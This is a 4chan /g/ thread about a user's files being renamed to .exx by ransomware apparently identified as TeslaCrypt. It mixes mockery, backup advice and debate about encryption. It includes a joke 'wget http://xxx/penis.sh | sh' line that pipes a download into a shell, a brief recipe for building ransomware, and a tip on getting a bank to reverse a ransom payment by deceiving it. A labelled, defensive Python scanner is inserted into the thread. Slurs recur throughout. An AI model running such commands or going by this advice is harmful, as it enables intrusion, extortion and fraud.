
/g/ - Technology

File: 48 KB, 966x786, 2015-05-13_130311.png
No.47962853

Having a heart attack situation here, had to take a chill pill to stop my hands shaking, some malware has renamed all my photos and .txt files, adding an .exx extension to them and now they won't open, /g/ help, pic related

>> No.47962864

This bait never gets old.

>> No.47962868


>> No.47962905

you heartless troll morons

>> No.47962939


>> No.47963091

Wipe your drive and restore from backup.

>> No.47963106


>> No.47963117

By wipe, you don't mean format do you?

>> No.47963125

Restore from backups.
This is a non-issue.

>> No.47963128

fuckers copy the files before encrypting.
Use active undelete or something else to scan the disk and recover what you can.

>> No.47963140

And if I turned off system restore?

>> No.47963156

He didn't say system restore, he said backup. If you don't have backups then they must not have been that important files to begin with.

>> No.47963157

system restore has nothing to do with personal file backup.
It simply allows you to unfuck your OS.

i seriously hope you actually have backups because if not, i feel sorry for you dude i really do

>> No.47963191

why would I open this theme if I even had backups?

>> No.47963197

You're fucked
All you can do is try coughing up the shekels
Next time install gentoo

>> No.47963207

because you keep thinking there's some magical button or setting to make the virus magically unencrypt your files.

You're fucked.
Learn to make backups next time.

>> No.47963218

Why do you care? Your photos are obviously not that important for you to bother with offline backups of them.
If they are that important, you'd have offline backups.
If they're not that important, just thank the virus for clearing up your disk space.

>> No.47963220

buttcoiners are getting really desperate

>> No.47963232

Sounds like you either didn't have Common Sense Premium 2017 Ultra Edition installed or enabled.

Just restore a backup. Don't have a backup? Wow. Too bad for you.

>> No.47963254

So how much do they ask for the key?

>> No.47963262

6 btc

>> No.47963269

>tfw keeping all external drives disconnected till i need them
>TFW never keep them connected ever
>TFW this virus would have absolutely 0 effect on me and i might lose a few downloads as a result but nothing major

>> No.47963279
File: 102 KB, 780x658, 1428954320083.jpg

GNU/Linux doesn't have this problem.

>> No.47963286

OP: you're fucked. Backups, etc.

By the way, how do people even get this shit on their systems?
I visit every kind of sketchy websites, and I haven't caught malware in 5+ years.

>> No.47963287

The worst thing about this ordeal is that OP still won't have backups after this.

>> No.47963309

Windows hides known file extensions by default, so plebs end up running executables when opening downloaded files.

>download porn

>search firefox on google
>download first link

>download latest hollywood jew movie

>> No.47963310

>wget http://xxx/penis.sh | sh
GNU/Linux has this problem, and it exists between the keyboard and chair.

>> No.47963321

Shoulda installed norton faggot

>> No.47963335

this is what you get for pirating video games

>> No.47963352 [DELETED] 
File: 260 KB, 358x310, bf8.png

Pay up or say bye

>> No.47963396

Try Shadow Explorer.

>> No.47963406 [DELETED] 

Where did you get "he" from? You should really use gender neutral language on an anonymous imageboard.

>> No.47963421

You are such a moron. Should be a lesson.

>> No.47963431

Are you sure the files are encrypted? The malware could just have appended the .exx extension to the files.

>> No.47963443

>gender neutral language
Sorry. I didn't mean to insult xir feelings. Should we go into a safespace and play with some playdoh and talk about our feelings?

>> No.47963448

Does that actually work? If the virus doesn't lie about RSA, it shouldn't.

>> No.47963466

no girls on the interbutts

>> No.47963471

2048 bit encryption is crazy. I wonder how long it took to encrypt all of your shit

>> No.47963502

12 hours to be exact around 40 000.png's 48 000 .jpg's 3000 .zip's plus the system files and others roughly 110 000 files

>> No.47963510

>implying backups aren't included in Common Sense Premium 2017 Ultra Edition Pro

step up, senpai

>> No.47963518

shut up, faggot

>> No.47963519

>I'm a special snowflake :D

>> No.47963524

12 hours, is that the time you have been away from your computer?

If I were to make this program, I would store the encrypted versions of the files in a temporary directory until the encrypting is done, then I would replace all the unencrypted files with encrypted ones so it would appear instant.

>> No.47963539 [DELETED] 

What if there wasn't enough free space

>> No.47963546

>not knowing ancient memes

>> No.47963552

Well if that is the case, then you would do it in segments. Directory by directory.

This malware seems pretty advanced

>> No.47963569

How the fuck are people even catching this?

>> No.47963572 [DELETED] 

But then they would notice it and probably do something like panic and shutdown?

>> No.47963583

Considering op has;
40 000.png's 48 000 .jpg's 3000 .zip's

It wouldn't be hard to mistake one single file for something it's not

>> No.47963593

Didn't you notice your computer screaming for mercy?

>> No.47963699

I was sleeping in the other room, I did not click any .exe files, the tricky thing masked itself as Microsoft Windows and asked me to make changes, it seemed legit so I clicked yes, next thing when I woke up, it was like I was still in a nightmare... good thing for chill pills I almost had an infarct

>> No.47963719
File: 100 KB, 1254x261, no girls.png

Are you that faggot from the other day that complained about using "guys" even though it refers to womyn too.

>> No.47963758

how can anyone get viruses nowadays
i thought people knew how to torrent
this isn't some kazaa or emule shit where u put "movie.name.here.2015" and tons of shit would pop up
tpb and other popular sites most of the time the most seeded torrent is always said thing

>> No.47963793

That thing has a surprisingly good manual and is taking the user step by step through the process, even with "what when X doesn't work?" thingies.

would download 10/10

>> No.47963811

>restoring the encrypted data

>> No.47963813

I thought so too, but the more I read about it, the more I notice how many people had this ransom malware

You would download what???

>> No.47963819

oh, fuck ... didn't read "from backup"

>> No.47963822

>not getting the joke
why are you searching for help on the 4chins anyway?

>> No.47963833


I wouldn't be surprised if these things don't actually encrypt any files and they just change the file extensions, given that most of the retards who download stuff like this wouldn't know how to use the files any more with different file extensions.

>> No.47963839

>he actually uses Windows
You got what was coming to you.

>> No.47963852

Try removing the .exx extension. If it fixes the file then you just have to run malwarebytes or whatever and rename back all your files.
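
Added example, not part of any post in this thread: several posts ask whether the files were really encrypted or only had `.exx` appended. The Python below answers that read-only, by checking whether each `*.exx` file still begins with the magic bytes of its original type and, for types without a header such as `.txt`, by measuring byte entropy. The verdict names, the 7.5 bits/byte cut-off and the sample files are assumptions constructed for illustration.

```python
import hashlib
import math
import os
import tempfile
from collections import Counter

SUFFIX = ".exx"  # extension reported in this thread
# Leading "magic" bytes of the file formats named in the thread.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".zip": b"PK\x03\x04",
}
SAMPLE_BYTES = 64 * 1024  # read at most this much of each file
MIN_BYTES = 1024          # entropy of a tiny sample says nothing
HIGH_ENTROPY = 7.5        # bits/byte; assumed cut-off, ciphertext sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(n / total * math.log2(n / total) for n in Counter(data).values())


def classify(path: str) -> str:
    """Return a verdict for one *.exx file. The file is only read, never changed."""
    original_ext = os.path.splitext(path[: -len(SUFFIX)])[1].lower()
    with open(path, "rb") as fh:
        data = fh.read(SAMPLE_BYTES)
    magic = MAGIC.get(original_ext)
    if magic is not None:
        # Images and archives are already compressed, so entropy cannot tell
        # them apart from ciphertext. The header can.
        return "header_intact" if data.startswith(magic) else "header_overwritten"
    if len(data) < MIN_BYTES:
        return "too_small"
    return "high_entropy" if shannon_entropy(data) >= HIGH_ENTROPY else "low_entropy"


def scan(root: str) -> dict:
    """Classify every *.exx file under root; keys are paths relative to root."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SUFFIX):
                full = os.path.join(dirpath, name)
                results[os.path.relpath(full, root)] = classify(full)
    return results


def demo() -> dict:
    """Build constructed sample files in a temporary directory and scan them."""
    # Deterministic stand-in for ciphertext: SHA-256 of a counter, 4096 bytes.
    noise = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(128))
    text = b"Shopping list: milk, eggs, bread, coffee.\n" * 100
    samples = {
        "holiday.png.exx": MAGIC[".png"] + noise,  # renamed only
        "cat.jpg.exx": noise,                      # content replaced
        "notes.txt.exx": text,                     # renamed only
        "diary.txt.exx": noise,                    # content replaced
        "todo.txt.exx": b"buy milk\n",             # too short to judge
        "untouched.zip": MAGIC[".zip"] + noise,    # no .exx suffix, skipped
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan(root)


if __name__ == "__main__":
    for name, verdict in sorted(demo().items()):
        print(f"{verdict:20} {name}")
```

Run `scan()` against a copy or a read-only mount of the affected disk. `header_overwritten` and `high_entropy` mean the content itself changed, so renaming the file back will not make it open.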

>> No.47963878
File: 17 KB, 1440x837, 2015-05-13_145405.png

I've tried it, before I even started the thread, it does not open

>> No.47963893

he probably thinks the criminal is here

>> No.47963899

How big of a retard do you have to be to even get something like this?

>> No.47963901

I didn't know that people loved the DOS encryption program so much that they converted it to windows 7. LOL what else did you expect.

>> No.47963904

OP READ THIS NOW -------------------------
You've been infected with TeslaCrypt.



Like the others said, you need to keep regular backups. You !at be in luck this time, who knows.

>> No.47963924

That word should have been "may". Not all ransomware is unrecoverable, some use static keys generated on your computer or stored in the file. Worst case: pay the ransom.

>> No.47963927 [DELETED] 

>when you still use emule and it works pretty alright for CP ;^)

>> No.47963934

Not unless you know your computer well. You can even use programs to prevent executables from creating new environment changes in an admin account.

Learn to program and exploit and never again use windows.

Did you know that windows 7,8 have many exploits, such as exploiting http.sys file to get into window. Idiots. Stop thinking windows is safe.

Linux is no better with their bash exploit.

>> No.47963961

>Linux is no better with their bash exploit.
Which has long been fixed

>> No.47963973

Doesn't this virus encrypt ALL your hard drives though. Not OP but I keep most of my HDDs and backup HDDs plugged in at the same time.

>> No.47963975

Here's something I don't get

How can encryption be so effective?

You need to do +4 DBAN (or maybe 1 or 50 depending on who you ask) runs to ensure your shit won't be recoverable by the feds

How can encrypting the shit ensure the old files can't be recovered? Whether by feds or a neckbeard at the local computer repair shop?

Also would it be possible to fetch a week-old backup and use it to help break the encryption on your malware-encrypted files?

>> No.47963995

Since their claims are legit, your options to get the data back are either pay up, or save all the files to an extra HDD and hand it down the generations until RSA-2048 can be decrypted in a single afternoon on a calculator. If you can make the purchase of the bitcoins to give them seem like someone else had access to your account, you could probably convince your bank to reverse the transaction, keeping the money.

>> No.47964001

>You need to do +4 DBAN (or maybe 1 or 50 depending on who you ask) runs to ensure your shit won't be recoverable by the feds
This isn't true so that explains the apparent contradictions.

>> No.47964008

what do you mean it masked itself as Microsoft windows?

>> No.47964010 [DELETED] 

Different cryptolockers target different things

>> No.47964011
File: 294 KB, 1024x768, 1407957458672.jpg

What's with the sudden increase in people getting ransomwared and frantically asking /g/ for help?

>> No.47964035

Just restore a backup.

Don't give those criminals any money.

>> No.47964036

Well, you see, I ran that setup.exe file and there was a dialog window created by the virus, pretending to be Windows. It asked me if I really want to run the setup.exe, and I said yes.

>> No.47964038

Unfortunately there is the scareware which is harmless, and then there is the cunty malware which actually encrypts files and folders on your PC.

Never underestimate the concept of routine backups to an external (and mostly offline) drive friend.

>> No.47964053
File: 340 KB, 1599x2181, 87204p.jpg

I see this stuff all the time at work.

You're fucked, OP. If you didn't make backups either pay up or say byebye.

>> No.47964055
File: 17 KB, 429x399, sip.jpg

You ran a random setup.exe that appeared out of nowhere?

>> No.47964056

First they ask us where to torrent from.
Now they all have ransomware.

I see a correlation.

>> No.47964060

No, not at all, I download it from the Internet prior to the incident.

>> No.47964065

What the fuck did you download?

>> No.47964069

To be clear, paying probably won't get you your files back.

>> No.47964070


>> No.47964072
File: 12 KB, 344x345, soda.jpg

Why did you download it?

>> No.47964073
File: 1.07 MB, 5616x3744, 1430189066088.jpg

>pretending to be Windows
>It asked me if I really want to run the setup.exe
>I said yes

You deserved it.

>> No.47964075 [DELETED] 
File: 16 KB, 251x235, 1424061296053.jpg

>where to torrent from.
And all you kikes said private trackers

>> No.47964079

>pretending to be Windows.

It was Windows you utter moron.

It was trying to stop you from installing dangerous software.

>> No.47964080

That variant doesn't actually use RSA, only AES with secret keys

>> No.47964081

You downloaded a single file called setup.exe, for no reason, and ran it?

>> No.47964095

from where did you download it? Are you even OP

>> No.47964100

He was probably trying to crack GTA 5 like every other gayman is right now

>> No.47964106

The basics of it is that you use a complex mathematical problem to obfuscate data, requiring the problem to be solved to make the data readable again. Possessing the decryption key essentially gives you the solution to the problem. Otherwise, you have to try and figure out the solution without being able to see the question. Encryption works because we can make problems that we lack the computing power to solve through brute force.

This is pretty far off point, but it's the best I can do while making it simple to understand.

>> No.47964108

>This fucking legit

>> No.47964113

You don't even know anything about what happened. How can you be so sure. I would be really really angry at you right now if not for those wonderful pills. Dude...

>> No.47964127

Well shit you're right, someone would just have to post the file on some torrent trackers / youtube videos and other places saying it's a cracked GTA5 and I bet they'll get loads of downloads
I didn't think it could be so easy

>> No.47964142

This guy. Drive densities are so high one pass is enough to make recovering anything mostly impossible. One of the leaked NSA newsletters had them celebrating that they managed to read data off a snapped CD - which took them months. Data recovery is hard.

>> No.47964147

The encryption is effective because there are problems humanity does not have a solution for. If you have two huge numbers, it's trivial to produce the product of them. But having the product, it's not feasible to do the reverse operation - find the multipliers. RSA uses this one-way operation to make encryption possible.

>> No.47964149
File: 354 KB, 456x546, 1427762331549.png

We're trying to help you. It's not his fault you're retarded and run random .exe files you download from the internet.

>> No.47964162

>Windows asked me if I wanted to run totallynotcryptolocker.exe
>I said yes
>But anything could have happened!!11

>> No.47964163

Actually it most likely will. They honor their promise so people have an incentive to pay.

>> No.47964169
File: 107 KB, 1280x720, 1428920114084.jpg

I'm trying to imagine what happened in OP's brain.
>hey there's a random setup.exe file I don't remember where I got it from
>better run it and see what happens, it might be dolphin porn lol

By the way, do you have a link for that malware? I'd love to give it a try.

>> No.47964172

>How can you be so sure.

Because that's how Windows works.
When you try to install something that isn't verified by Microsoft (and very little software is because it's expensive and time consuming) it will nag you for confirmation.

Have you never installed software?

>> No.47964184 [DELETED] 

>not disabling UAC

>> No.47964187

Also why the fuck would malware ever ask for confirmation?
It will just do it.

>> No.47964188

it was a virus i am sure of that

you guys are blind to your own shortcomings

>> No.47964208
File: 1.52 MB, 1065x902, 1426074080251.png

And you downloaded the virus and ran it.

>> No.47964221

it disguised itself as windows

no one would have seen through that

>> No.47964227

>it was a virus i am sure of that

No it wasn't.
You don't even know what a virus is and how it differs from a trojan HAHAHAHAHAHA.

Please fuck off back to /b/, we're all GLAD tech illiterates like you get fucked.

>> No.47964240
File: 335 KB, 800x1200, Yew 'avin a giggle mate.png

Is this the birth of an epic new meme?

>> No.47964246

i implore you to reconsider

>> No.47964247
File: 3 KB, 125x120, 1424585866680s.jpg

Not everyone downloads random executables from the internet that claim to be windows. Did you download it from microsoft.com? No?

You still willingly ran the file.

>> No.47964252

>it disguised itself as windows

So not only don't you know what a virus is, you also don't know what windows is.

You better be a troll because nobody should be this retarded.

>> No.47964258

>we're all GLAD tech illiterates like you get fucked
No we don't
Go away fucking dumb edgy wannabe tryhard retard. Goddamn shit.

>> No.47964260

Ignore people making fun of this, let me reason with you. If you made something like this, wouldn't you want it to be silent until most of the files were encrypted? Why pop up anything? Once your code is running it's already game over

>> No.47964277

OP, I'm not trying to sound like an asshole.
Just tell us what you downloaded and where you downloaded it from. Without that info we'll all just assume you're an idiot.

>> No.47964281

my mind says maybe but pills are giving me a resounding no

it's people like you and >>47964252 >>47964247 who are jealous of the amazing programming capabilities of whoever came up with the virus

>> No.47964288

Not him, but please stop posting.

>> No.47964289
File: 26 KB, 320x320, janeway.jpg

He downloaded setup.exe from the internet.

>> No.47964304

Why not give your computer those pills that's clearly some strong shit

>> No.47964307

I'd like to know exactly what you downloaded and where from.

It would help others immensely.

>> No.47964327
File: 446 KB, 500x320, ngbbs5520b63b107bd.gif


>> No.47964349

reading this whole thread gave me a headache.

Op, you are a goddamn retarded chimp who shouldn't even be near a computer.

>> No.47964352

The Window blocked everything else, when I pressed Cancel, it appeared again, I was suspecting this was either a really urgent matter from Microsoft or malicious malware, but in either case I had to continue my work so I figured what the hell, since it did seem legit Microsoft crap and this was Windows 8 I decided to click yes, and if it was a malware deal with it later, from my previous experience with viruses, I knew in worst case scenario it will delete all, and then I could restore, or less it will only infect the .exe files of my PC, alas it encrypted everything I cared for .txt .png and .jpg I never even heard of encrypting virus before, thus my gruesome mistake

>> No.47964357

I found the server:
It can be found by searching the server headers on shodan.io


Authors confirmed as opsec retards

>> No.47964372 [DELETED] 

There is no way people are that stupid

>> No.47964376

You still haven't told us what the file was supposed to be and exactly where you downloaded it from. I won't take "setup.exe from the internet" as an answer, be specific.

>> No.47964383
File: 81 KB, 1070x358, Screen Shot 2015-05-13 at 15.15.45.png

pic related

>> No.47964384

Apparently OP is

>> No.47964385

Where did you download the file from.

>> No.47964390

The internet

>> No.47964396



>> No.47964401

You know when I recall it, I think you are right, but each time I clicked cancel, the question appeared again, blocking everything else I have opened, so at the 1000th cancel click, I caved in and clicked yes... the rest I explained above.

>> No.47964405

Its actually one of the simplest to create. Use openssl to generate random key, loop through all files on drive, read them, openssl to encrypt them, write them as filename.exx, delete originals, submit secret key to server, show dialog demanding payment.

That is what is so scary about these - for something so simple they can be completely devastating and effective.

>> No.47964406

I'm trying to figure it out but my mind is too occupied right now for me to be able to produce the right answer. Boy am I glad I took those pills...

>> No.47964413

If you aren't OP fuck off.


>> No.47964425

>No, not at all, I download it from the Internet prior to the incident.
Ah, the Internet. THAT explains everything.

You're fucked OP, unless you pay up. Try to avoid paying if at all possible, don't give your money to crooks.

>> No.47964430

Not your average DO box. It blocks ping nodes and even when scanning without ping nodes it produces fuck-all results.

>> No.47964432
File: 73 KB, 720x602, 1426074448100.jpg

So not only did you download a random file from the internet, but it was so random that you don't even remember. People like you keep my store in business.

>> No.47964438

ok, op was a troll.
fun's over.

>> No.47964442


>> No.47964451

you heartless troll moron

>> No.47964467

I'm crying over here

>> No.47964468

These things can be downloaded by other malware. This person may have downloaded setup.exe, but it could have come from a bad torrent, a Facebook message attachment, an infected USB, or another computer on the network. Don't think you have to be stupid to get these.

>> No.47964474
File: 81 KB, 420x600, foryoursafety.jpg

OP might be a troll, but people really can be that stupid.

>> No.47964483


>blocks ping nodes
>ignores ping requests

FTFY. This is trivial on any linux box, it's a one line addition to your iptables rules.

>> No.47964489

>Don't think you have to be stupid to get these.
Yes you do.

Just look at every post from OP. He's a complete retard.

>> No.47964501

Maybe this'll teach you the importance of backups. Faggot.

>> No.47964504

He still downloaded setup.exe. He downloaded something from a shady website. If he never downloaded setup.exe he wouldn't have his issue.
It's entirely his fault.

>> No.47964510

inb4 this becomes copypasta

>> No.47964512

I'm going to find you and smash your face with a fucking shovel you little shit.

>> No.47964519

I'm not OP. It's just fucking funny for some reason.

>> No.47964532

Ok so looking at this (not op), how would the proper procedure be to avoid something like this fucking up your backups too

I run daily automated backups on an external HDD, but obviously someone could make malware like this that fucks over the backups too, by looping the mounted drives.

How do you deal with this problem? Literally unplug it after each backup?

>> No.47964539

Hopefully you'll never have to deal with anyone you care about or someone who cares about you getting one of these. OP got this from just one infection vector. Don't think that's the only way out there.

There were several adobe flash 0days that dropped ransom ware on computers without any warning, distributed through malicious ad banners on legitimate sites. You could be fully patched and everything secure yet still be caught out by that.

>> No.47964540

I know but your average server does not do this. that coupled with that the reverse dns leads to a slav shit domain that pretends to be "under construction" raises a couple of alarms

>> No.47964543

>implying its not a /g/entooman holding him ransom

>> No.47964552

This is what you get for not keeping backups, how does one even get a virus like that if you're not a complete moron. I bet you fell for the common sense® meme too.

>> No.47964558

>downloading flash anywhere but adobe.com
>downloading flash ever

Pants-on-head retarded.

>> No.47964571

Yes, the whole HDD not just some partitions.

>> No.47964590

>raises a couple of alarms
>know home of call for ransom-malware

Can't fool you huh?

>> No.47964594
File: 252 KB, 600x641, smarter than my dog.png

I need it to play Bloons Tower Defense 5.

(I'm not lying. My account is at level 73 and I have about 16K Monkey Money.)

>> No.47964601



Don't be a fucking idiot and write off everyone who uses flash as a retard. Keep pretending firefox, ie or chrome 0days have never existed.

>> No.47964611

I think you meant curl

>> No.47964613

I have 200 torrents+ mostly tv shows, each time I start the computer this question has appeared maybe from 4-5 months, each time I clicked cancel, except for yesterday when it appeared in the middle of my work which it never did, yesterday I downloaded only one torrent but when it completed my files were already encrypted and with added .exx to them, did not even have a chance to install or click anything from the torrent, so it could not be from it, this is the link if anyone wants to check http://www.torrenthound.com/hash/a1d8e4297ef8c9c23780561747c84b760d37a34d/torrent-info/Metal.Gear.Solid.2.Substance-SiMON

>> No.47964621

How would backups help?
Assuming it encrypts all your externals + NAS, then the backups would get infected too.

and making backups is useless if it isn't automatic. uploading everything online would take ages for someone with 100kb/s upload speed.

>> No.47964623

what reason is there to use curl when you have wget

>> No.47964630

The hilarious thing about cryptolocker is that people dumb enough to get it are the same people dumb enough to not have backups.

Incidentally, I've always wondered: How *do* people get cryptolocker?

I mean, it's not like you go on google search and search “cryptolocker install” and run the .exe, is it?

What kind of fucked up things are these people actually installing? I don't get it

>> No.47964645

>willingly using botnets

>> No.47964651

For some reason I missed the fact that there wasn't even a TLD and thought there would actually be some amusing script at the end of that.

Screw you for getting my expectations up.

>> No.47964656

>this question has appeared
useful information

>> No.47964666

>flash can give you malware
>having flash installed
>not having noscript installed
>not blocking flash by default
>not having CSRF whitelist enabled
>not blocking all ads by default anyways

do you even browser security

>> No.47964667

The key is in the registry

>> No.47964676

Why dont you nigger just simply renamed the file extension ? :)

>> No.47964696

why don't you read the thread

>having flash installed
flash is needed for a lot of legit sites. not having it installed would be extremely annoying. I just have it blocked by default, and enabled on trusted sites.

>> No.47964728
File: 780 KB, 300x225, 1431428525445.gif

This is why I'm glad I use Linux.

>> No.47964748

I can't tell if /g/ is either incredibly gullible or has transcended bait and is stringing the OP along pretending not to get that it's bait

>> No.47964753


>> No.47964756
File: 120 KB, 1024x640, 134_8_0_prm-generic1_1024x640.jpg

That's what happens when you pirate, you dirty commie.

You know why I never get these sort of things? Because I buy my shite.

There's no such thing as a free lunch and OP just found that out the hard way.

>> No.47964763


>> No.47964765

Fucking idiot, don't you think he would have done that already if he had backups?

>> No.47964770

Similar thing happened at a local company and that shit spread over WiFi, so I had 1 month of work for me.
All I did was put MSE (yes) on a CD and boot every computer in safe mode and cleaned it.
Tho this one might be different

>> No.47964795



>> No.47964807

what the hell? is that saber? why does she look so weird?

>> No.47964809

Thank you sir, I pressed CTRL+R and typed in "regedit" I am currently in the registry, how to search for the key?

>> No.47964811

i've been pirating shit for 12 years, on windows, and have never gotten anything malicious.

that includes using keygens, cracks and visiting sketchy sites that redirect

>> No.47964815

This reminds me of the time when some 10 year old kid and his father came to my store and asked me to fix the kid's tablet. It had this lock on it that said that the kid was caught browsing zoophilia and child pornography and they had to pay $300 for the Department of Homeland Security to not send him to jail forever.

If I could only describe the look on their faces. I wouldn't be surprised if the kid got a beating before they even came to the store.

>> No.47964832

Why are you so fucking gullible?

>> No.47964840

If it's teslacrypt, it uses a long patched flash exploit.

>> No.47964855

The fuck are you talking about?
I'm not saying I believe OP for a minute.

I'm saying you don't need flash completely uninstalled.

>> No.47964885
File: 557 KB, 1920x1080, Andrea & Jenn go APARTMENT HUNTING - THE ANDREA & JENN SHOW ep. 1.mp4.Still001.jpg

I have backups on Google Drive with versioning so even if the encryption tried to overwrite the backup copies as well, I could just restore the files to their original state.

CryptoLocker BTFO.

>> No.47964907

>some malware has renamed all my photos and .txt files

how'd you take the fucking screenshot then? :^)

>> No.47964921

Or you could just use CryptoPrevent and never have to worry about this shit again.


>> No.47964933

Durr hurr Common Sense 2015. Durr hurr, I'm a retard.

That's what you get, faggot.

Next time stop being a cheap cunt and buy a proper AV license like Kaspersky Total Security 2015 or Bit Defender Total Security 2015.

Hell, If you're still a cheap shit, get Avira.


>> No.47964951


>> No.47964958
File: 328 KB, 1024x623, Check-Out-the-Revamped-Click-to-Play-Flash-UI-in-Firefox-3.png

If you absolutely NEED Flash, then I understand you having it installed because some services still require it, but if you don't have it set to click-to-play in your browser and instead have it set to always run on any website, you dun goofed.

NEVER have Flash or any other plugin run on a website without your explicit permission.

>> No.47964987

>I put my files in the botnet!
>I win against viruses!
>...right guys?

>> No.47964997
File: 32 KB, 504x348, TotallyAVirusYouGuise.jpg

Did it look like this picture? If so, it was a User Account Control pop-up. That's Windows. It's to notify you that a program is trying to access administrator-level privileges. This can be changes to system settings and files, installing a program, or starting a program. This has the potential to completely destroy your system if it's malicious code. It was not a program trying to masquerade as Windows. Malicious code will at all costs avoid giving you an option to not have it run.

I hope that next time you'll think twice before running exes from the web, especially if you can't be sure that it's legit.

>> No.47964999

You can make an argument for flash, but anyone who still uses JAVA applets in this day and age should be strangled to death.

NEVER run java inside your browser EVER.

>> No.47965009
File: 20 KB, 207x172, 0466 - HmuIYFv.png

>le ebin botnet meme

>> No.47965019

They raided databases of previous cryptolockers, and toasted them on the web.

>> No.47965028


>> No.47965032

Is it really a meme when we talk about Google? I thought everyone on /g/ had heard of Snowden and the NSA a long time ago.

>> No.47965038
File: 392 KB, 697x667, 0477 - YIcwQy8.jpg

I use Linux and only install packages from signed repos to be on the safe side.

This has served me well over the past 10 years.

>> No.47965046

Got exactly what you deserve for

a.) Being stupid enough to run Windows
b.) Being stupid enough to install malware

Install Gentoo or leave /g/ forever.

>> No.47965074

I want to know this

Feeling sorry for you OP
Honestly I might've clicked on the file just to know what it is

I download a lot of stuff and, as I have shit Internet, I check things twice before deleting them
>I feel sorry for you bud

>always install an anti virus and an anti malware
>because you never know :^]

>> No.47965080

it was broken longer

>> No.47965091

There are ways to get lifetime Malwarebytes Anti-Malware licenses, I suggest that even to the 'Common Sense' meme crowd.

>> No.47965098

What's wrong with running Windows?

>> No.47965109

Carnival Phantasm. Go watch it.

>> No.47965118

That's Firefox.

>> No.47965145

OP is probably one of those retarded children or unemployed neckbeard virgins that reply "common sense 2015" to threads that ask what the best antivirus is.

He is also one of those retards that disabled UAC because "it's inconvenient and bothered me too much" or some shit.

In other words, OP is a faggot and deserves all of this bullshit.

>> No.47965148
File: 36 KB, 528x492, 0549 - pUyjYAP.jpg

It's not Unix, that's what's wrong.

>> No.47965159

Wget doesn't output to stdout without -O - or saving to /dev/stdout
And smallpox is still a problem despite being eradicated entirely. Just like polio and the USSR. It's not a problem anymore.

>> No.47965163

It only ran once, encrypting all the files it could, then ceasing. Ergo, any new files will be safe.

>> No.47965171

>disabled UAC because "it's inconvenient and bothered me too much"
Except UAC is useless.
Do you really need a fucking pop-up reminding you that every single executable can make changes to your system? Nigger you're retarded.

>> No.47965177

Fuck off, freetard. Some of us have jobs and need Windows to run work related programs, but you wouldn't know, since you're an unemployed neckbeard that lives in his parent's basement, jacks off to anime and has nothing but time to be autistic and fuck around with an unusable hipster OS.

>> No.47965200

>downloading flash
>not using chrome

>> No.47965203

format your hard drive
never use windows ever again
never run software from outside of your repos ever again
restore everything you need from your backups

>> No.47965205

UAC is worse than that, it only works on some specific folders.

>> No.47965206

No, you are retarded, UAC can stop autoexecuting programs from fucking your shit up by not allowing them to run immediately and telling you that they are trying to run, in which case you can tell it to not let them run.


>> No.47965213

I like your memes, very nice

>> No.47965216

>submit secret key to server
Do you really think they would unlock your PC if you pay them?

>> No.47965219

xxx is a tld

>> No.47965226

>UAC can stop autoexecuting programs
You don't need UAC to stop auto-executing, are you fucking serious?

You really are a fucking dumbass child that has no idea what they're doing.

>> No.47965243

So, what does sudo do that UAC doesn't?

>> No.47965244

Oh, good point. Doesn't have an A record attached to it, though.

>> No.47965272


Isn't it a little late for preventing anything? All my files are already encrypted to shit

>> No.47965276

seems like you wouldn't know either seeing as your workplace doesn't even provide you with a separate computer for work
using microsoft word at school doesn't count as work :^)

>> No.47965277
File: 99 KB, 600x350, emma-watson-smiling.jpg

There is literally NOTHING wrong with using Firefox.

>> No.47965299

It auto-ran with each start of Windows, and I cancelled it each time. It did look like this, but yesterday it ran in the middle of my work and I clicked yes... since each time I clicked cancel it appeared back, blocking everything else that was in the background

>> No.47965314

They are two completely different things. One is a notification prompt, the other is a temporary privilege elevation. Can't compare them really.

>> No.47965320
File: 1.52 MB, 400x255, 1425173663617.gif

so instead of booting into safemode and removing it, you just ignored it until you got frustrated and let it infect your system.

You are absolutely fucking retarded to the highest level.

>> No.47965328

>literally NOTHING wrong with using Firefox

>> No.47965335


count the amount of threads open that actually discuss technology and not just consumer bullshit.

>> No.47965336

From 1 to 10, how retarded do you have to be to get one of these?

>> No.47965352

Retarded enough to use windows.

>> No.47965365

The wit of 4chan is astounding

>> No.47965393

- Spend $100 on an external HDD

- Dual boot Windows and GNU/Linux. Only boot into Windows when needed, i.e. to play a game

Problem solved.

>> No.47965455
File: 2 KB, 562x90, 2015-05-13_175420.png

Could this fella really be telling the truth, and the simple solution to my problem is in the registry?

>> No.47965479

Probably not, unless the dev put it there to troll.

>> No.47965481

Cryptolocker detected.

>> No.47965492

This isn't a big problem, you just need to figure out the distribution of prime numbers

>> No.47965495

>did not install gentoo
Why couldn't you follow simple instructions?

>> No.47965502

Well duh of course they would. The point of modern ransomware is that it does decrypt if you pay them, so people spread the word that you can pay to get the files back and they make more money.

If binary analysis guys come back saying "nope it just erases files with random junk" then what's their business model? Cryptowall has made millions from people paying. They even offer a service for you to decrypt a file for free to prove they can.

>> No.47965551
File: 64 KB, 397x366, 1398691785896.jpg


Just pay up.

>> No.47965561

No goyim. Go hustle for sheckles elsewhere.

>> No.47965572

Hey, a superior Linux user here...
Just wanna see what kinda windblow problems regular windblow users have

>> No.47965586

That doesn't solve anything. It makes you feel better for spending less time in Windows, as if malware is installed by some cumulative probability. Try thinking how people encounter malware, beyond muh dangerous OS.

>> No.47965594

fucking retards

>> No.47965596

No he was just spouting shit.
Malware programmers aren't that retarded.

>> No.47965609

>downloading and running executable files
hue hue hue

Tbh you are fucked unless this has been reversed and their server compromised, congrats, you lost.
Go format and stop enabling flash and java. Don't run executables that aren't verified.

>> No.47965654

>links to an executable on their server
>privacy policy and terms of use links go nowhere
seems legit

>> No.47965840
File: 442 KB, 2048x1536, unless1.jpg

unlesssss... I take out this HDD, wire it to another PC with Norton on it, delete the virus, and then decrypt my files back to normal again?

>> No.47965937

Kinda. There have been copycats that will not decrypt your data. I recall one where they found the key to unlock it so you don't have to pay, and the earlier ones didn't fuck with your shadow copy so you had a chance of getting some files back.

>> No.47965981

>decrypt a file for free

sounds great

